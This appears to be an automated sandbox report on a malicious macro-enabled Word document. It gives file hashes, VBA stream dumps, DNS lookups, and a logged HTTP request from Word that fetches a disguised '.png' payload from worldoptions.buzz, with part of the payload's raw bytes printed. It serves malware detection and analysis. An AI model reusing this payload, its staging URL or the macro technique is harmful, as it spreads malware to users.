              Preview:[folders]..Templates.LNK=0..template[1].LNK=0..[doc]..template[1].LNK=0..
              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:55 2022, mtime=Tue Mar 8 15:45:55 2022, atime=Sun Aug 14 14:38:14 2022, length=51033, window=hide
              Category:dropped
              Size (bytes):1019
              Entropy (8bit):4.538758479797877
              Encrypted:false
              SSDEEP:12:8qCK80gXg/XAlCPCHaXNBQtB/xQpX+WT9aiEVlIjuicvbbzajlWDtZ3YilMMEpxJ:8qCXk/XT9SIp9tEkNeXz1Dv3qTau7D
              MD5:CE81AA7CAA96AB93764982AD610D868B
              SHA1:1118B8B3EB3AA7321DB3D13D8A75ACB2F998AAD8
              SHA-256:689F29512ABDBEB358039E1F3C67DF4530CAB1F181B0467EE6C3620D498521CE
              SHA-512:9946D20200077F44EFC7B3A865E5F6276AEEB0EB957EE3773858B1D132FC989CACD629C69038B1575FC7C004BAF5F7B96A251FFF414BD2191B646B51D1F28A44
              Malicious:false
              Preview:L..................F.... .....2..3....2..3...)@....Y............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.Y....U.| .TEMPLA~1.DOC..L......hT..hT..*...r.....'...............t.e.m.p.l.a.t.e.[.1.]...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\116938\Users.user\Desktop\template[1].doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.t.e.m.p.l.a.t.e.[.1.]...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......116938..........D_....3N...W...9G..N..... .....[D_....3N...W...9G
              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              File Type:data
              Category:dropped
              Size (bytes):162
              Entropy (8bit):2.503835550707525
              Encrypted:false
              SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
              MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
              SHA1:23684CCAA587C442181A92E722E15A685B2407B1
              SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
              SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
              Malicious:false
              Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              File Type:data
              Category:dropped
              Size (bytes):162
              Entropy (8bit):2.503835550707525
              Encrypted:false
              SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
              MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
              SHA1:23684CCAA587C442181A92E722E15A685B2407B1
              SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
              SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
              Malicious:false
              Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
              File type:Microsoft Word 2007+
              Entropy (8bit):7.873361527141924
              TrID:
              • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
              • Word Microsoft Office Open XML Format document (49504/1) 32.35%
              • Word Microsoft Office Open XML Format document (43504/1) 28.43%
              • ZIP compressed archive (8000/1) 5.23%
              File name:template[1].doc
              File size:60418
              MD5:8f21756219d4e736219011174eb0534b
              SHA1:4429c35b62d55abe159e130c095fc988e640f3fd
              SHA256:394c97cc9d567e556a357f129aea03f737cbd2a1761df32146ef69d93afc73dc
              SHA512:315e36c7fb746ed22bac49c5121c448e2b5a53741e2467d4ecacda372c0d79da50cc0d1d2b4a68f425540e1c667558293862e54ea8f9fd537485d1c327c7d3e2
              SSDEEP:768:urH9EDL1s1p6qCS1ioGwmFRdoUzQLgRlpqVmbTzD1CNJbOz+zaN18OIZ5grp/0GR:ur6Lm1p7QDdoaQLgRYm7pQNOz71IW5R
              TLSH:054302ADD306B820E77AC0B4D81715F6F779F5461384F0EB02C9C508D52A25BB2DBE81
              File Content Preview:PK..........!...E.....#.......[Content_Types].xml ...(.........................................................................................................................................................................................................
              Icon Hash:e4eea2aaa4b4b4a4
              Document Type:OpenXML
              Number of OLE Files:1
              Has Summary Info:
              Application Name:
              Encrypted Document:False
              Contains Word Document Stream:True
              Contains Workbook/Book Stream:False
              Contains PowerPoint Document Stream:False
              Contains Visio Document Stream:False
              Contains ObjectPool Stream:False
              Flash Objects Count:0
              Contains VBA Macros:True
              Author:ismail - [2010]
              Template:Normal.dotm
              Last Saved By:ismail - [2010]
              Revion Number:1
              Total Edit Time:403197
              Create Time:2021-11-01T09:30:00Z
              Last Saved Time:2022-08-08T09:27:00Z
              Number of Pages:1
              Number of Words:0
              Number of Characters:0
              Creating Application:Microsoft Office Word
              Security:0
              Number of Lines:0
              Number of Paragraphs:0
              Thumbnail Scaling Desired:false
              Company:home
              Contains Dirty Links:false
              Shared Document:false
              Changed Hyperlinks:false
              Application Version:14.0000
              General
              Stream Path:VBA/ThisDocument
              VBA File Name:ThisDocument.cls
              Stream Size:116091
              Data ASCII:. . . . . . . . ^ . . . . . . . . . e . . . Y L . . L . . . . . . . . . . F . . # . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . Z w A l l o c a t e V i r t u a l M e m o r y . . . F . X . . . . . . . . . . . . . . . . . . . . . . . . . . . I n t e r n a l _ E n u m U I L a n g u a g e s . . . . . . V . . . . 8 . . . . . . . . . . . . . . . . . . . . . . M u l t i B y t e T o W i d e C h a r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:01 16 03 00 00 9c 01 00 00 5e 09 00 00 80 01 00 00 ac 02 00 00 ff ff ff ff 65 09 00 00 59 4c 01 00 eb 4c 01 00 00 00 00 00 01 00 00 00 46 dc de e0 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 a8 00 00 00 00 00 3a 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5a 77 41 6c 6c 6f 63 61 74 65 56 69 72 74 75 61 6c 4d 65 6d 6f 72 79 00 00

              General
              Stream Path:PROJECT
              File Type:ASCII text, with CRLF line terminators
              Stream Size:438
              Entropy:5.135068995536572
              Base64 Encoded:True
              Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 9 2 B 8 5 D 3 8 9 D 3 8 9 D 7 8 D D 7 8 D " . . D P B = " 5 2 5 0 F E D 5 3 A F 2 3 A F 2 C 5 0 E 3 B F 2 A B C 6 4 C D 3 C 2 B E C B 9 6 1 5 5 5 3 C 6 8 2 C 0 E 8 B 5 7 1 6 C 6 8
              Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56
              General
              Stream Path:PROJECTwm
              File Type:data
              Stream Size:41
              Entropy:3.0773844850752607
              Base64 Encoded:False
              Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
              Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
              General
              Stream Path:VBA/_VBA_PROJECT
              File Type:data
              Stream Size:3089
              Entropy:4.456644559189449
              Base64 Encoded:False
              Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
              Data Raw:cc 61 97 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
              General
              Stream Path:VBA/dir
              File Type:data
              Stream Size:470
              Entropy:6.238099893292352
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . g d . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . E O f f i c E O . f . i . c E . . . E 2 D F . 8 D 0 4 C - 5 B . F A - 1 0 1 B - B D E 5 E A A C . 4 . 2 E g r
              Data Raw:01 d2 b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 67 aa f0 64 0e 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
              TimestampSource PortDest PortSource IPDest IP
              Aug 14, 2022 08:39:17.945976019 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:18.100560904 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:18.100760937 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:18.723445892 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:18.878485918 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:18.878959894 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:18.878985882 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:18.879002094 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:18.879014015 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:18.879096031 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:18.879122019 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.303687096 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.461611032 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.462470055 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.462491989 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.462526083 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.462543011 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.462634087 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.462914944 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.462933064 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.462959051 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.462960005 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.462995052 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.463001013 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.463002920 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.463025093 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.463037014 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.463043928 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.463082075 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.463135958 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.463186979 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.504666090 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.617491961 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.617527962 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.617552042 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.617577076 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.617600918 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.617625952 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.617670059 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.617697954 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.617759943 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.617784023 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.617976904 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.618030071 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.618055105 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.618084908 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.618096113 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.618220091 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.618244886 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.618266106 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.618280888 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.618424892 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.618448973 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.618468046 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.618484974 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.618664026 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.618689060 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.618716002 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.618736029 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.618937969 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.618963957 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.618989944 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.619014978 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.619157076 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.619174957 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.619206905 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.621609926 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.772519112 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.772553921 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.772572041 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.772588968 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.772686958 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.772694111 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.772703886 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.772725105 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.772736073 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.773006916 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.773029089 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.773068905 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.773138046 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.773154974 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.773179054 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.773192883 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.773335934 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.773376942 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.773380041 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.773411036 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.773596048 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.773614883 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.773644924 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.773660898 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.773797989 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.773814917 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.773839951 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.773854971 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.774044037 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.774061918 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.774094105 CEST4917180192.168.2.2264.52.80.45
              Aug 14, 2022 08:39:19.774283886 CEST804917164.52.80.45192.168.2.22
              Aug 14, 2022 08:39:19.774302006 CEST804917164.52.80.45192.168.2.22
              TimestampSource PortDest PortSource IPDest IP
              Aug 14, 2022 08:39:17.902492046 CEST5586853192.168.2.228.8.8.8
              Aug 14, 2022 08:39:17.929238081 CEST53558688.8.8.8192.168.2.22
              Aug 14, 2022 08:39:26.343050957 CEST4968853192.168.2.228.8.8.8
              Aug 14, 2022 08:39:26.362221956 CEST53496888.8.8.8192.168.2.22
              Aug 14, 2022 08:39:28.321213961 CEST5883653192.168.2.228.8.8.8
              Aug 14, 2022 08:39:28.345190048 CEST53588368.8.8.8192.168.2.22
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Aug 14, 2022 08:39:17.902492046 CEST192.168.2.228.8.8.80xde9dStandard query (0)worldoptions.buzzA (IP address)IN (0x0001)
              Aug 14, 2022 08:39:26.343050957 CEST192.168.2.228.8.8.80xfed1Standard query (0)www.google.comA (IP address)IN (0x0001)
              Aug 14, 2022 08:39:28.321213961 CEST192.168.2.228.8.8.80xef1cStandard query (0)com.lightbuzear.buzzA (IP address)IN (0x0001)
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Aug 14, 2022 08:39:17.929238081 CEST8.8.8.8192.168.2.220xde9dNo error (0)worldoptions.buzz64.52.80.45A (IP address)IN (0x0001)
              Aug 14, 2022 08:39:26.362221956 CEST8.8.8.8192.168.2.220xfed1No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)
              Aug 14, 2022 08:39:28.345190048 CEST8.8.8.8192.168.2.220xef1cNo error (0)com.lightbuzear.buzz64.52.80.180A (IP address)IN (0x0001)
              • www.google.com
              • com.lightbuzear.buzz
              • worldoptions.buzz
              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.2249172142.250.185.228443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.2249173142.250.185.228443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              10192.168.2.224918264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              100192.168.2.224927264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              101192.168.2.224927364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              102192.168.2.224927464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              103192.168.2.224927564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              104192.168.2.224927664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              105192.168.2.224927764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              106192.168.2.224927864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              107192.168.2.224927964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              108192.168.2.224917164.52.80.4580C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              TimestampkBytes transferredDirectionData
              Aug 14, 2022 08:39:18.723445892 CEST0OUTGET /agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.png HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: worldoptions.buzz
              Connection: Keep-Alive
              Aug 14, 2022 08:39:18.878959894 CEST2INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:18 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Last-Modified: Mon, 08 Aug 2022 09:27:12 GMT
              ETag: "1375-5e5b76baf9c00"
              Accept-Ranges: bytes
              Content-Length: 4981
              Keep-Alive: timeout=5, max=100
              Connection: Keep-Alive
              Content-Type: image/png
              Data Raw: 91 50 26 31 d9 d9 d9 d9 84 91 5a 34 d1 91 54 94 fa 91 1e 1b 97 ca d9 d9 59 e8 72 91 26 18 91 26 13 ac 2c 17 3e f9 76 57 12 72 72 72 3f f9 32 6a 3f ff 12 62 3f f9 76 56 8e 3b f9 0a 12 f8 35 7c 4e 40 06 7a 3f f9 72 3f 4b 92 07 9f 3b f9 02 42 9b ad 72 72 72 23 20 21 27 24 25 3a fb 8f 3a fb 81 24 f9 01 4e f9 c6 6c fa 72 72 72 3a 73 ac 24 f9 04 52 3a 73 ac 3a 43 bb 3a 8d bb f3 07 72 a1 b2 df c8 8d b3 df 3a 73 aa 24 3a 43 84 7d cc 62 4a a4 06 78 b3 bc 75 73 a4 3a 8d b2 99 9d 4b 07 72 2c 07 ad 28 3a fb ad f9 28 56 3a 73 89 14 f9 7e 39 f9 28 6e 3a 73 89 f9 76 f9 3a 73 8a 3a fb 37 72 2c 3a f1 b7 7a f1 0f 72 72 07 e3 2d 2c 2f 29 28 2b b1 3a fb 94 32 f2 96 82 22 21 23 20 3a f9 2c 7a 3a f9 24 62 3a b5 b3 6e 72 72 72 f8 71 fa 76 78 3a 8d b1 3a 8d b0 f2 49 72 07 82 b4 76 78 72 3a f9 34 62 3a f1 9e 52 3a fb b3 8d e5 fa 72 72 72 3a f1 b6 52 f1 8a 8d 3a f9 3c 6a 06 76 fb 73 99 74 b5 73 72 72 72 72 28 2b 29 2a 3a fb 86 b0 6a 72 18 72 18 72 3a fb 95 b5 75 c6 eb 01 d6 9a 7d 8d 8d 8d 3a f1 9e 52 3a b5 b3 72 72 72 72 3a b5 b0 72 72 22 72 3b b5 b2 72 42 72 72 3b b5 b3 32 72 72 72 8d 65 3a f1 b6 52 3a f1 b6 62 3a fb b5 b5 35 7a e2 0c 73 13 b5 35 62 93 c6 4e c4 b5 35 3a 45 99 4b 0d b5 35 32 4c 1d 20 7c b5 35 22 4d 2f 80 6c b5 35 42 f1 67 44 03 b5 35 6a 32 80 3b 5c b5 35 52 98 50 a2 4b b5 35 5a 65 3f c0 bc b5 35 4a f6 d4 d2 37 b5 35 2a f0 9d 7d c9 b5 35 12 01 d7 48 03 b5 35 1a 2e 40 c7 a9 b5 35 02 3a 35 54 2d b5 35 0a f3 4c 78 12 b5 f5 f2 72 72 72 0f ab b4 41 b5 f5 fa 72 72 72 18 c5 7a cb b5 f5 e2 72 72 72 ba c6 09 62 b5 f5 ea 72 72 72 ac c1 c4 35 b5 75 c6 eb 01 d6 b5 f5 d2 72 72 72 ee 08 82 01 b5 f5 da 72 72 72 10 bd 34 cf b5 f5 c2 72 72 72 d8 8b 39 50 b5 f5 ca 72 72 72 18 3d 7a cb b5 f5 b2 72 72 72 24 6d 70 73 b5 f5 ba 72 72 72 aa 0c a4 d2 b5 f5 a2 72 72 72 53 83 93 fd 9a 72 8c 8d 8d 3a f1 9e 52 3a b5 b3 72 72 72 72 3a b5 b0 72 72 73 72 3b b5 b2 72 62 72 72 3b b5 b3 76 72 72 72 8d 65 3a f1 b6 52 3a 77 72 8c 72 72 3a fb f5 42 73 72 72 3a ff f7 65 60 72 72 3a ff fd 36 73 72 72 3a fb b9 f8 62 fa 63 3a 8d b2 3a 8d b3 f2 4a 72 07 83 18 72 3a ff 76 56 3a f1 9e 52 3a fb b3 8d e5 d2 72 72 72 3a f1 b6 52 3a f1 b6 7a 3a f1 9e 32 3a ff 2e 56 62 3a f1 9e 52 3a fb ab 8d e5 e2 72 72 72 3a f1 b6 52 14 f9 71 14 fb f5 4a 73 72 72 f8 11 70 f8 31 74 14 fb f5 4e 73 72 72 3a f1 b6 32 14 f9 f5 4a 73 72 72 b3 92 62 14 f9 f5 4e 73 72 72 fb f5 32 73 72 72 f3 cd 32 73 72 72 75 78 94 75 7d fd 28 7c 72 72 3a ff ff 46 60 72 72 3a ff ed 36 73 72 72 3a ff f5 ad 77 72 72 22 21 23 9a ea 8f 8d 8d 3a f1 cd ad 77 72 72 72 06 56 f3 cd 32 73 72 72 73 78 94 75 0c 7e b4 f5 95 77 72 72 70 9b 05 73 72 72 b4 f5 95 77 72 72 73 9b 19 73 72 72 3a ff ff 4c 60 72 72 3a ff ed 36 73 72 72 3a ff f5 b6 77 72 72 22 21 23 9a 3f 8f 8d 8d 3a f1 cd b6 77 72 72 72 06 56 f3 cd 32 73 72 72 74 78 94 75 0c 7e b4 f5 be 77 72 72 70 9b 5e 73 72 72 b4 f5 be 77 72 72 73 9b 52 73 72 72 3a ff ff 23 60 72 72 3a ff ed 36 73 72 72 3a ff f5 9a 77 72 72 22 21 23 9a 70 8f 8d 8d 3a f1 cd 9a 77 72 72 72 06 56 f3 cd 32 73 72 72 6e 7b 94 75 0c 7e b4 f5 82 77 72 72 70 9b 93 72 72 72 b4 f5 82 77 72 72 73 9b a7 72 72 72 3a ff ff 35 60 72 72 3a ff ed 36 73 72 72 3a ff f5 bf 77 72 72 22 21 23 9a c5 8e
